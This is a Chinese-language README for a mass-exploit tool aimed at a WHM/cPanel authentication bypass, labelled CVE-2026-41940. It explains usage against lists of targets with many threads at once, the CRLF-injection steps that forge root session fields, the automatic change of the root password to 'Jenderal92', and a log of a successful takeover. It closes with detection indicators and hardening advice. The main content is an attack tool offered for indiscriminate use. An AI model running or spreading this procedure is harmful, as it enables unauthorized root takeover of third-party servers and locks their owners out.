CVE-2026-41940 是 WHM/cPanel 中的一个严重 认证绕过 漏洞,攻击者无需有效凭据即可绕过认证并获得服务器的 root 访问权限。该漏洞利用了会话处理机制中的 CRLF 注入来注入恶意会话参数。
本工具提供 批量利用 能力,支持多线程同时测试多个目标,具备智能成功检测和自动过滤无效目标的功能。
| 功能 | 描述 |
|---|---|
| ✅ 批量利用 | 从列表文件扫描并利用多个目标 |
| 🚀 多线程 | 可配置线程数以加快扫描速度(默认:15) |
| 🔐 自动更改密码 | 利用成功后自动将 root 密码更改为 Jenderal92 |
| 🛡️ 智能成功检测 | 自动检测各种 WHM API 响应格式 |
| ⚠️ 许可错误过滤 | 排除出现无效/无法读取许可证错误的目标 |
| 📝 结构化输出 | 仅将以 `domain:port |
| 🛡️ SSL/TLS 支持 | 自动处理自签名证书 |
| 🔄 会话管理 | 自动进行会话提取、Cookie 注入和令牌处理 |
| ⏱️ 超时控制 | 可配置连接超时(默认:15 秒) |
| 🔍 连接前检查 | 在尝试利用前验证端口可用性 |
| 📊 实时进度 | 显示每个利用阶段的详细进度 |
pip install requests urllib3 futures
或使用 requirements.txt:
requests==2.27.1
urllib3==1.26.18
futures==3.4.0
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940
# Install dependencies
pip install -r requirements.txt
# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py
创建一个 targets.txt 文件,每行一个目标:
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com
注意: 端口
2087是 WHM 默认端口。如果未指定,将自动使用 2087 端口。若缺少 HTTP/HTTPS 前缀,也会自动添加。
python2 CVE-2026-41940.py targets.txt
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5
# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30
| 参数 | 描述 | 默认值 | 必需 |
|---|---|---|---|
list_file | 包含目标列表的文件(每行一个) | - | ✅ 是 |
--threads | 并发线程数 | 15 | ❌ 否 |
--hostname | 为所有目标覆盖 Host 头 | 自动发现 | ❌ 否 |
--timeout | 连接超时(秒) | 15 | ❌ 否 |
res.txt)仅保存确认成功的利用目标。带有许可错误、密码更改失败或连接问题的目标会被自动排除。
格式:
domain:port|root|Jenderal92
示例输出:
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92
以下目标 不会 被保存到 res.txt:
Cannot Read License File)$ python2 CVE-2026-41940.py targets.txt --threads 10
CVE-2026-41940 bypass authentication - Mass Exploit
[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED
==================================================
[*] Checking target: 127.0.0.1
Original input: 127.0.0.1
Normalized: https://127.0.0.1:2087
Port 2087: OPEN
Testing connection... OK (HTTP 200)
[0] hostname = example.com
[1] minting a preauth session...
session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.118.0.13"}
[*] attempting to change the root password
passwd -> HTTP 200
{
"data": {
"app": ["system"]
},
"metadata": {
"output": {
"raw": "Password for \"root\" has been changed."
},
"reason": "Password changed for user \"root\".",
"version": 1,
"command": "passwd",
"result": 1
}
}
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!
[✓] SUCCESS & SAVED: 127.0.0.1:2087
Saved to res.txt: 127.0.0.1:2087|root|Jenderal92
==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4
[+] Results saved to res.txt
Successfully exploited targets (password changed to Jenderal92):
✓ 127.0.0.1:2087
该利用程序包含 4 个主要阶段,并带有智能验证:
[1] minting a preauth session...
/login/?login_only=1 发送带有无效凭据的 POST 请求whostmgrsession Cookie,<obhex> 部分提取会话基础[2] sending the CRLF injection...
Authorization: Basic 头的 GET 请求root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
\r\n)字符会注入伪造的会话参数Location 头中包含 cp_security_token[3] firing do_token_denied to propagate...
/scripts2/listaccts 端点do_token_denied 机制[4] verifying we're WHM root...
/json-api/version 以验证 root 级访问权限/json-api/passwd API 将 root 密码更改为 Jenderal92{"metadata": {"result": 1}}(cPanel v11.118+){"status": 1}(旧版本){"result": [{"status": 1}]}(传统格式)该工具会自动排除:
{"status": 0, "statusmsg": "Cannot Read License File"}| 指标 | 描述 |
|---|---|
异常的 whostmgrsession Cookie | 未经正常认证的异常 Cookie 模式 |
| 头中的 CRLF 字符 | 检测 HTTP 头中的 \r\n 序列 |
访问 /scripts2/listaccts | 未经授权访问该路径 |
密码 Jenderal92 | 使用此特定密码成功登录 |
cpsess 令牌泄露 | 安全令牌出现在 Location 头中 |
| 登录失败后即成功 | 先向 /login/?login_only=1 发送错误密码 POST,随后获得特权访问 |
# WHM access log
/usr/local/cpanel/logs/access_log
# cPanel error log
/usr/local/cpanel/logs/error_log
# Authentication log
/var/log/secure
# System messages
/var/log/messages
立即将 WHM/cPanel 更新到最新修补版本
/usr/local/cpanel/scripts/upcp
为所有账户(尤其是 root)启用双因素认证(2FA)
WHM → Security Center → Two-Factor Authentication
通过 IP 白名单限制 WHM 访问
WHM → Security Center → Host Access Control
定期监控访问日志中的可疑模式
tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
如果怀疑遭到入侵,更改所有密码
使用防火墙规则限制对 2087 端口的访问
# Allow only trusted IPs
iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 2087 -j DROP
# Or use CSF/LFD firewall
csf -a YOUR_TRUSTED_IP
部署 WAF 规则以检测 CRLF 注入尝试
对 WHM/cPanel 安装进行定期安全审计
echo "https://myserver.com:2087" > my_server.txt
python2 CVE-2026-41940.py my_server.txt --threads 1
python2 CVE-2026-41940.py all_servers.txt --threads 20 --timeout 20
python2 CVE-2026-41940.py servers.txt --threads 5 --timeout 45
python2 CVE-2026-41940.py servers.txt --hostname internal.cpanel.server --threads 10
# targets.txt can contain various formats:
https://server1.com:2087
http://server2.com:2087
server3.com:2087
127.0.0.1:2087
10.0.0.50
# All will be normalized automatically
python2 CVE-2026-41940.py targets.txt --threads 15